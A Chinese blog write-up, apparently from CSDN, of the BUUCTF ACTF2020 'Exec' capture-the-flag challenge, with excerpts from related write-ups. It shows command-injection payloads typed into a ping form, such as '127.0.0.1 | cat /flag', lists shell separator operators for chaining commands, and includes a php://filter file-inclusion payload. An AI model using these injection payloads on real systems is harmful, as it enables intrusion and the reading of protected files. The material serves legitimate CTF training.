BUUCTF [ACTF2020 新生赛] Exec

最新推荐文章于 2024-04-22 23:13:35 发布
最新推荐文章于 2024-04-22 23:13:35 发布
阅读量941 收藏 2
点赞数
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF ACTF2020 新生赛 Exec writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/109150636
版权

BUUCTF [ACTF2020 新生赛] Exec

启动靶机,打开环境:
在这里插入图片描述

页面可以执行Ping命令,判断应为命令执行漏洞
尝试输入正常IP127.0.0.1查看其回显:

127.0.0.1

在这里插入图片描述
其为正常回显,测试管道连接符|是否能用:

127.0.0.1 | ls

在这里插入图片描述
管道连接符|可以正常使用,并且ls命令可以正常执行
查看根目录:

127.0.0.1 | ls /

在这里插入图片描述

发现flag文件,使用cat命令查看:

127.0.0.1 | cat /flag

得到flag
在这里插入图片描述
基础的通过管道连接符|就可以的命令执行漏洞,未作任何过滤与限制。

Senimo_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf_Exec
qq_61968245的博客
12-19 889
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞和训练平台,为各位 CTF 选手提供真实题在线复现等服务。https://buuoj.cn/challenges 0x02 题目 打开题目就看到大大的PING,二话不说直接ping个本地ip 涉及知识点: 在命令执行的过程中,可以通过一些常用特殊字符来执行其他语句 ; //命令分割符,即当执行完第一个命令,继续执行下一个命令 | //管道 0x03 解题 那么尝试在当前文...
BUUCTF-随便注、Exec、EasySQL、Secret File
m0_62905261的博客
06-13 766
目录[强网杯 2019]随便注[ACTF2020 新生]Exec[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File打开场景,里面有输入框,上面自带一个1,点击提交,有回显输入1 ' or '1'='1 有回显,因该是字符型猜测是sql注入,查询字段数,输入1' order by 1 #当查询到第三个字段的时候,回显异常,说明只有两个字段输入1' union select 1,2 # 回显一个正则过滤规则过滤了很多的东西 查询数据库,输入1'; show databa
Buuctf-Web-[ACTF2020 新生]Exec 题解&思路总结
最新发布
m0_62239233的博客
04-22 467
常见的web漏洞——命令注入
[ACTF2020 新生]Exec
siu~
08-28 613
[ACTF2020 新生]Exec 解题
buuctf-web入门-[ACTF2020 新生]Exec 1
2301_80137226的博客
03-24 340
我们首先尝试一下ping本机127.0.0.1(本地回环地址)然后我们尝试看一下flag下是否还有目录。然后再遍历目录,查找我们需要的flag。当../../../时发现flag。我们尝试127.0.0.1;在此之前先了解一下常用的命令。可以看到没有过滤分号和ls。大致判断这道题没有过滤。我们再尝试打开flag。一道简单的命令注入题。
BUUCTF-[ACTF2020 新生]Exec1
qq_59607911的博客
11-02 332
php模拟我们常用的DOS命令ping命令的方法,主要用到的是php的内置函数exec来调用系统的ping命令,从而实现ping命令功能的。从而想到通过exec函数来进行RCE。本题主要考察对rce漏洞里面一些漏洞的使用。
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
[ACTF2020 新生]Exec1
m0_75178803的博客
10-11 640
windows有多个磁盘所以就会有‘多个根目录’,在dos命令模式下,在D盘的某文件夹中输入‘cd/’命令回车后会直接回到D盘的根目录。‘/’在linux中表示根目录。而windows表示目录的方式与Linux有所不同,Windows下有磁盘分区的概念,而Linux下只有目录的概念,所以‘/’所表示的意义在两个系统中有所不同。原理:web应用在调用这些函数执行系统命令的时候,在没有做好过滤用户输入的情况下,如果用户将自己的输入作为系统命令的参数拼接到命令行中,就会造成命令注(命令执行)的漏洞。
buuCTF】[ACTF2020 新生]Exec1
weixin_54957456的博客
10-11 2148
其实嘛,这篇wp主要写给自己看的,本人也是三天打鱼两天晒网的菜鸟,自己写wp才能验证真的学会了嘛。想要和我一起学习的朋友也拜托指出1我的不足啊! 这道题CSDN和其他博客上已经有很多wp了,每道wp的解法都不尽相同,所以这里本人在学习了解法后还总结归纳了一下其他大佬们所用的一些解法。 这道题是属于非常基础的命令执行题了,连空格和分号都没有过滤→_→。 方法一:常用的管道符 包括:|,||,&,&&,; 其中: | :按或位,直接执行管道符后的语句。 ...
BUUCTF [ACTF2020 新生]Exec
m0_49025459的博客
04-18 1391
题目 输入127.0.0.1|ls /看根目录 | 输入127.0.0.1|cat /flag看flag 这道题就是利用管道符来做 可以直接在ping输入框中输入1;cat /fag;也可以 1|cat /flag 1&cat /flag 当然如果使用 ||必须需要前面是一个假的,就是前面条件为假才执行后面的否则只执行前面的 所以可以用 a||cat /flag 以上方法都可以得到结果 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或).
[ACTF2020 新生]Include
qq_41696518的博客
05-18 1272
[ACTF2020 新生]Include 打开网页,发现有个tips连接,点进去发现只提示一句话Can you find out the flag?,说明flag很可能是被隐藏在这个页面中;F12 发现也什么都没有 联想题目名字是include,所以这肯定是一个文件包含漏洞的题,很有可能答案就在文件中 后缀加入?file=php://filter/read=convert.base64-encode/resource=flag.php,输出一串base64编码的字符串 PD9waHAKZWNobyAiQ2
buu题解—[ACTF新生2020]Universe_final_answer
m0_73393932的博客
01-04 358
逆向
BUUCTF】[ACTF2020 新生]Exec1
aoao331198的博客
02-15 3311
题目网站是一个可以ping各种地址的小程序,返回的应该是命令执行结果 于是想到注入其他命令 127.0.0.1 | ls 接着查看根目录 127.0.0.1 | ls / 看见flag,最后打开它即可 127.0.0.1 | cat /flag ...
[ACTF2020 新生]wp
xlcvv的博客
04-06 4409
直接ping ip可以得到结果,试一下: 拿到flag。 像这种什么都没过滤的题目,可以利用常见管道符直接执行命令: 常见管道符 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 4、&&(就是逻辑与),如果前面为假...
BUUCTF WEB [ACTF2020 新生]Exec1
guishengyx的博客
10-18 207
使用管道符|执行ls可以发现只有一个index.php文件 使用../返回上一层 没什么发现,继续返回上一层 直到第三次发现flag文件 使用cat打开flag 常见管道符 1、|(直接执行|后面的语句) 2、&(&前面和后面命令都要执行,无论前面真假) 3、||(如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句) 4、&&(如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令) Linux常用命令 ...
[ACTF2020 新生]Exec 1
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令注入问题,根据引用的内容来分析,可以使用命令注入来解题。在这道题目中,使用命令注入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值